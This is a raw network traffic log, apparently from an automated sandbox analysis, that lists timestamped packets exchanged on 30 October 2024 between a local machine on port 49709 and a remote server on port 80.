                              Oct 30, 2024 20:19:03.433495045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433574915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.433588028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433599949 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433650017 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.433734894 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433744907 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433803082 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.433883905 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433893919 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.433940887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.434009075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434123993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434134007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434144020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434180021 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.434218884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.434492111 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434561014 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434571028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434606075 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.434714079 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434725046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.434771061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.435064077 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.435116053 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.435127974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.435142994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.435185909 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.476963043 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.477030039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.477039099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.477075100 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.477078915 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.477111101 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.520081997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.520287037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.520298004 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.520344973 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553268909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553348064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553359032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553437948 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553483963 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553499937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553503990 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553560972 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553625107 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553637028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553694963 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553734064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553796053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553853035 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.553908110 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553919077 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553930044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.553958893 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.554109097 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554172993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.554313898 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554388046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554399014 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554455042 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.554550886 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554567099 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554579973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554593086 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554605961 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.554636955 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.554795027 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.554845095 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.596612930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.596631050 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.596642017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.596930027 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.639545918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.639662981 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.639672995 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.639837027 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.639837027 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.672831059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.672852039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.672862053 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673036098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673063993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673125029 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673178911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673191071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673194885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673275948 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673321009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673331976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673418045 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673477888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673528910 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673558950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673569918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673635960 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673834085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673882008 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.673926115 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.673989058 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674011946 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674062967 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.674134970 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674197912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674207926 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674247026 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.674333096 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674350977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674360037 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.674388885 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.674418926 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.716213942 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.716273069 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.716281891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.716290951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.716481924 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.759344101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.759437084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.759445906 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.759651899 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.792598963 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792666912 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792718887 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.792764902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792794943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792804956 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792824030 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.792855024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.792980909 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.792990923 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793000937 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793010950 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793036938 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.793071985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.793410063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793629885 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793678045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793684959 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.793751955 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793803930 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.793838978 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793849945 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.793895006 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.794074059 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794167042 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794178009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794203043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.794302940 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794344902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794354916 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.794357061 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794404984 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.794651031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794709921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794719934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.794753075 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.836004019 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.836075068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.836085081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.836152077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.836184025 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.878855944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.878892899 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.878904104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.879021883 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.913077116 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913130045 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913141966 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913158894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.913197041 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.913273096 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913283110 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913332939 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.913410902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913460016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913470984 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913508892 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.913712025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913722992 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913727999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913738012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.913770914 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914045095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914056063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914066076 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914077044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914102077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914130926 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914463997 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914511919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914693117 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914704084 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914751053 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914856911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914869070 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914877892 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914887905 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.914911985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.914942980 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.955482960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.955713034 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.955723047 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.955766916 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:03.998569012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.998594046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.998606920 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:03.998711109 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.032115936 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032130003 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032139063 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032645941 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032665968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032675028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032804012 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032815933 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.032993078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033001900 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033011913 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033023119 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033238888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033248901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033473969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033535957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033545971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033691883 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.033937931 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034059048 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034070015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034127951 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034171104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034182072 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034193039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034409046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034652948 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.034696102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.044228077 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.075287104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.075298071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.075306892 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.075359106 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.075432062 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.075493097 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.118050098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.118138075 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.118163109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.118172884 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.118206024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.118244886 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.151462078 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.151511908 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.151523113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.151642084 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.152169943 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152180910 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152215958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152251959 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.152282953 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.152297020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152307987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152324915 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152359009 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.152542114 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152553082 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152592897 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.152678013 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152714968 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.152729988 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.153227091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153292894 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.153376102 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153516054 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153526068 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153536081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153547049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153558016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153572083 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.153620005 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.153641939 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153656006 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153666973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.153733015 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.154112101 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154122114 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154155016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154175043 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.154206991 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.154243946 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154254913 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154263973 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.154294014 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.194871902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.194922924 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.194933891 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.194978952 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.195020914 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.237623930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.237643957 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.237653017 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.237740993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.271575928 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271588087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271605015 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271615028 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271627903 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271680117 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.271706104 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271754980 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.271789074 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271799088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271852970 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.271944046 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271953106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271962881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271974087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.271990061 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272025108 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272274971 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272330046 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272352934 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272365093 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272403955 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272466898 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272619009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272675037 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272680044 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272691011 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272743940 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.272840977 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272851944 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.272918940 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273168087 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273221016 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273231983 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273261070 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273350954 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273401976 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273459911 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273530960 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273541927 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273557901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.273581028 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273612022 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.273753881 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314459085 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314479113 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314488888 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.314594984 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.314647913 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.357414961 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357460022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357470989 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.357559919 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391479969 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391539097 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391550064 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391561985 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391618967 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391722918 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391736031 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391751051 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391762018 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:04.391813993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:04.391844034 CET4970980192.168.2.646.8.237.66
